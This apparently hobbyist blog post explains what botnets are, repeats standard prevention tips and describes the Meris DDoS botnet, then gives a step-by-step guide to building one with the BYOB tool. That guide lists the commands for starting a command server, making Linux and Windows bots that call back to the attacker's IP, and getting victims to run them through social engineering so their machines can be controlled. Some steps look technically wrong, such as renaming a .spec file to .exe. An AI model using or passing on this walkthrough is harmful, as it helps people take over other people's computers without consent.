All About Botnet by IMK
⭕🔱🇰🇦🇱🇮™🔱⭕Today we are going to learn how botnet works and what is it. We are learn how to create our own botnet.
What is Botnet?
A combination of the words “robot” and “network”, a botnet is simply a network of connected devices which are capable of connecting to the internet.
Each device is running at least one “bot”, which is a small program which can take automated actions quickly and remotely.
BotNet and Ransome ware Course
How can you prevent botnets?
While 100 percent prevention is not possible, there are a few things you can do to dramatically reduce your computer's risk of infection, starting with these tips from STOP. THINK. CONNECT., the national cybersecurity education and awareness campaign:
Keep a Clean Machine
- Keep software current: Having the latest operating system, software, anti‐virus protection, web browsers and apps are the best defenses against viruses, malware, and other online threats.
- Enable automatic updates: Most security software will automatically connect and update to defend against known risks. Turn on automatic updates if that’s an available option.
- Protect all Internet‐connected devices: Remember smartphones, tablets, gaming systems and other devices can be infected with viruses and malware, too. Protect them like you would your computer, including updating apps and operating systems.
- Plug & scan: USB sticks, thumb drives, CDs, DVDs and other external media can be infected by viruses and malware. Use your security software to scan them.
Connect With Care
- When in doubt, throw it out: Delete any online communications (i.e., texts, emails, social media posts) that look suspicious, even if you think you know the source.
- Get savvy about Wi‐Fi hotspots: When using a public or unsecured wireless connection, avoid using sites and apps that require personal information like log‐ins.
- Be cautious about “scareware:”Cybercriminals have used fear to compromise your computer and to steal your personal information, which may include credit card information and banking login credentials. If you get security notices saying you are infected and need to purchase software, these could very well be attempts to compromise your device.
🔥World's Most Dangerous Botnet 🔥
Meris Botnet
A new botnet has been observed breaking records of previous DDoS attacks as it generated 21.8 million requests per second. Dubbed Meris, the botnet targeted the Internet company from Russia, Yandex. So far, it has infected thousands of networking devices.
How Meris broke Botnet records
The backbone of the Meris malware is the old Mirai DDoS malware. However, unlike Mirai’s DDoS, which focused on bandwidth attacks, Meris relies on specialized modules that launch volumetric attacks.
- Meris has revived volumetric (application layer) DDoS threats
- The botnet’s size also makes it noteworthy; DDoS attacks rarely scale so extensively
- 8 million bogus requests per second were launched in a single week
- 250,000 devices affected globally
🔥HOW TO BUILD YOUR OWN BOTNET 🔥
BYOB (Build Your Own Botnet) is an few lines python code where you can create your own botnet by using some simple commands. This project was implemented for security researchers and developers. This tool is designed to implement some of your own features as per requirement. For showing you this tool has been tested on Kali Linux 2018.3 as a attacker, and we will build BYOB sever on same kali linux.
- For cloning type
- git clone https://github.com/malwaredllc/byob.git
- Then type cd byob
- Type pip install -r requirements.txt
- Type python setup.py
- After pressing enter it will ask for password. Simply enter Kali Linux password
- Here two terminals will be used, first terminal will be Bot Server where sessions will be handled andsecond terminal the Bot Client where bots will be created.
- After Installing above all dependencies, type python server.py –port 445
- port 445 is used to start server on this particular port. You can assign any of the port.
- After starting server type help to view some important commands of the bot server.
- Then open another linux terminal.
- Type cd /home/iicybersecurity/Downloads/byob/byob
- Then type python client.py –help
- Type python client.py –name testbot.py (Attacker Ip) 445
- –name is used to enter botnet name. Here name of the bot is testbot.py
- Attacker ip is your IP address.
- 445 is the same port used to assign botnet server on 445. You have to enter same port number as assigned in bot server.
- After executing the above query, a new botnet will be created. The above query will execute
- Now you can use any social engineering trick anyone to open bot in their computer.
- Here we have two targets. First one is the Linux and second one is the Windows.
TARGET LINUX MACHINE :-
- Now we have open botnet in target Linux machine.
- For opening bot simply type python testbot.py in target Linux terminal.
root@kali:/Downloads/python testbot.py
- When above query is executed in target machine. A session will be created in botnet server.
- The above connection will be created when bot is executed in target machine.
- For checking session go to bot server terminal where bot server is running and type sessions
- As you can see the target is showing true. That means bot is completely configured in target machine.
- Now you can run various commands to manipulate target.
TARGET WINDOWS MACHINE :-
- Now for creating for windows bot type python client.py –name testbot2.py –freeze (Your IP) 445 in Linux terminal.
- –name is used to enter bot name. Here name of the bot is testbot2.py
- –freeze is used to create windows executable file.
- 445 is the same port used to assign botnet server on 445. You have to enter same port number as assigned in bot server.
- After executing above query two files will be created. testbot2.py & testbot2.spec
- Rename the testbot2.spec to testbot2.exe.
- For renaming type mv testbot2.spec testbot2.exe
- Now we have open botnet in target Windows machine.
- For running bot in windows target machine. Python 2.7 must be installed and environment variablesmust be set to execute bot.
- For setting python PATH environment go to : https://www.python.org/download/releases/2.7/
- Then Open My Computer Properties>Advance System Settings>Environment Variables>System Variables.
- Click on New and Enter Variable Name : PathVariable Path : path\to\your\python\installer
- For checking if python has configured properly. Open cmd in Windows machine and type python –version
- After configuring python, run bot in cmd.
- When above query is executed in target machine. A session will be created in botnet server.
- For checking session, type clients
- As you can see the target is showing true. That means bot is completely configured in target machine.
- Now you can run various commands to manipulate target.
For video tutorial check below video